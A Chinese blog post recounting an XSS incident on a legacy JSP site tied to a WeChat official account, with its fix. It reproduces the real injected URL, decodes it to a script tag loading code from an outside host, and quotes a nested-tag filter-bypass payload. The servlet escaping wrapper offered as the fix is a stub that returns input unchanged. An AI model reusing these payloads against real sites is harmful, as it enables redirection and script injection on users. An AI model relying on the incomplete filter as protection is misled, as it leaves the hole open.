微信公众号之XSS攻击

最近入职新公司后接手了一个项目，线上遇到一连串微信公众号的问题，都是项目之前留下的坑，之前没有接触过微信开发，踩完坑来记录一下。

XSS攻击

前景提要

公司项目属于比较旧的项目，没有前后端分离，还是用的SSM+JSP的架构，导致接口请求时被注入js脚本恶意跳转，然后被微信封了一批接口（例如https://www.aa.com/bb/cc接口被攻击，以bb为前缀的接口都会被封禁）

之前接触过的项目是前后端分离的，后台接口是REST风格，就算传入参数带有js脚本也造成不了影响（REST接口只向客户端返回数据），所以对XSS攻击没有太多了解，大概是接口做转发时把传入参数带到页面，然后页面对参数进行了一定的解析，遇到标签就执行了里面的代码，比如线上出现的这个恶意转发的问题，访问url被篡改成：

https://www.aa.com/bb/list.do?keyWord=1234abce';location.href%3Dja\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003a\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u005b\u0027\u0077\u0072\u0069\u0074\u0065\u0027\u005d\u0028\u0061\u0074\u006f\u0062\u0028\u0027\u0050\u0048\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0043\u0042\u007a\u0063\u006d\u004d\u0039\u004c\u0079\u0039\u0036\u004d\u0069\u0035\u006b\u0064\u0057\u0039\u0034\u0061\u0069\u0035\u006a\u0062\u0032\u0030\u0076\u0065\u0044\u0034\u0038\u004c\u0033\u004e\u006a\u0063\u006d\u006c\u0077\u0064\u0044\u0034\u00)3d%5Cu0027%5Cu0029%5Cu0029%5Cu003b%60//&U2FsdGVkX1zzdsgbfh2FHrdW3ZNZs1FOcFbGj59O9LB5LAOCgNzzdsgbfh2F4ptuBX9mEGb3vpzzdsgbfh2BSnd25kgUGphUaOJHIzzdsgbfh2BTPCkXKT0LbtZzzdsgbfh2Bfzzdsgbfh2Bqd3zi9OoMBzK5Xhxz4dBsaUb5JuWw76Vf1hfGimEQ5UkxSUJc99tewtIVsSwzzdsgbfh3Dzzdsgbfh3D&money=16217&from=groupmessage#1589503652828`

一看这个url，里面有location.href，很明显就是被转发了，但后面那一串是什么？我们来解析一下

做个转义加编码转换，得到了下面的：

https://www.aa.com/bb/list.do?keyWord=1234abce';location.href=javascript:document['write'](atob('PHNjcmlwdCBzcmM9Ly96Mi5kdW94ai5jb20veD48L3NjcmlwdD4)3d'));`//&U2FsdGVkX1zzdsgbfh2FHrdW3ZNZs1FOcFbGj59O9LB5LAOCgNzzdsgbfh2F4ptuBX9mEGb3vpzzdsgbfh2BSnd25kgUGphUaOJHIzzdsgbfh2BTPCkXKT0LbtZzzdsgbfh2Bfzzdsgbfh2Bqd3zi9OoMBzK5Xhxz4dBsaUb5JuWw76Vf1hfGimEQ5UkxSUJc99tewtIVsSwzzdsgbfh3Dzzdsgbfh3D&money=16217&from=groupmessage#1589503652828`

看到atob()函数，是BASE64的解密，对PHNjcmlwdCBzcmM9Ly96Mi5kdW94ai5jb20veD48L3NjcmlwdD4)3d解密一下，得到：

<script src=//z2.duoxj.com/x></script>7t

这解析完是不是头大了，还有这种操作，之前看到知乎某个大佬总结XSS攻击的各种js脚本的写法，有一种更绝，预判你的预判，利用过滤后返回语句再次构成攻击语句来绕过，比如这种

http://192.168.1.102/xss/example3.php?name=<sCri<script>pt>alert("hey!")</scRi</script>pt>

，当你把<script>过滤后留下的字符又组成了新的标签<sCript>，真的是强

更多XSS攻击的姿势可见：https://zhuanlan.zhihu.com/p/26177815

问题解决

得，上面讲了一堆细节的，回到问题本身。线上用户访问被封禁的链接后会看到下面这个图

微信还贴心的提供了申请恢复访问功能，这个申请一般是解决完系统漏洞后再去提交的，如果以前有解决经验可以先申请再修复，因为微信审核还是有点慢的（像我们领导联系了微信内部人员加紧审核，也用了4小时才审核通过）

然后我们来说下解决方法

像我们公司的项目页面用的jsp，可以在通用jsp页面中设置taglib，在标签类中做过滤的逻辑。

标签类一般继承TagSupport，然后重写doStartTag方法，在里面做过滤逻辑，标签类的定制化程度较高，这里就不贴代码了

另一种方法就是在servlet Filter中过滤，一般是重新包装chain.doFilter(ServletRequest var1, ServletResponse var2)中传入的HttpServletRequest，例子如下：

public class XssHttpServletRequestWrapper extends HttpServletRequestWrapper {
    protected Log log = LogFactory.getLog(XssHttpServletRequestWrapper.class);

    public XssHttpServletRequestWrapper(HttpServletRequest request) {
        super(request);
    }

    @Override
    public String getHeader(String name) {
        String header = super.getHeader(name);
        return StringEscapeUtils.escapeHtml4(header);
    }

    @Override
    public String getQueryString() {
        return htmlAndScriptEscape(super.getQueryString());
    }

    @Override
    public String getParameter(String name) {
        String parameter = super.getParameter(name);
        return htmlAndScriptEscape(parameter);
    }

    @Override
    public String[] getParameterValues(String name) {
        String[] values = super.getParameterValues(name);
        if (values != null && values.length > 0) {
            int length = values.length;
            String[] escapeValues = new String[length];
            for (int i = 0; i < length; i++) {
                escapeValues[i] = htmlAndScriptEscape(values[i]);
            }
            return escapeValues;
        }
        return super.getParameterValues(name);
    }

    @Override
    public ServletInputStream getInputStream() throws IOException {
        String string = this.getRequestBody(super.getInputStream());

        try {
            Map<String, Object> map = JSON.parseObject(string, Map.class);
            Map<String, Object> resultMap = new HashMap<>();
            for (String key : map.keySet()) {
                Object val = map.get(key);
                if (map.get(key) instanceof String) {
                    resultMap.put(key, htmlAndScriptEscape(val.toString()));
                } else {
                    resultMap.put(key, val);
                }
            }

            string = JSON.toJSONString(resultMap);
        } catch (Exception e) {
        }
        final ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(string.getBytes());

        return new ServletInputStream() {
            @Override
            public int read() throws IOException {
                return byteArrayInputStream.read();
            }

            @Override
            public boolean isFinished() {
                return false;
            }

            @Override
            public boolean isReady() {
                return false;
            }

            @Override
            public void setReadListener(ReadListener listener) {

            }
        };
    }


    /**
     * @param stream
     * @return
     */
    private String getRequestBody(InputStream stream) {
        String line = "";
        StringBuilder body = new StringBuilder();

        BufferedReader reader = new BufferedReader(new InputStreamReader(stream, Charset.forName("UTF-8")));
        try {
            while ((line = reader.readLine()) != null) {
                body.append(line);
            }
        } catch (IOException e) {
            e.printStackTrace();
        }
        return body.toString();
    }
    /**
     * 过滤逻辑
     * @param 过滤前的参数
     * @return 过滤后的参数
     */
    private String htmlAndScriptEscape(String input){
        //处理逻辑
        ...
        return input;
    }

总结

其实回想起来这不过是个小问题，摸清楚问题的本质是很重要的，出现问题后首先应该知道这个错误为什么会发生，它的原理是什么，然后就能很快找到它出现问题的地方，剩下的就是找方法解决了。大部分人都踩过同样的坑，所以一般出现的问题都有解决方法。

不过在这次线上问题处理中，我犯了一个错误：
线上反馈问题后，我没有第一时间做紧急方案处理，导致线上这个链接相关的服务都没办法进行下去。正确的处理是将公众号菜单中链接的域名切换至备用的域名，这样链接就不会受限，用户访问也是正常的。然后才去解决漏洞的问题。
事情分紧急情况先后处理，这是一个很重要的习惯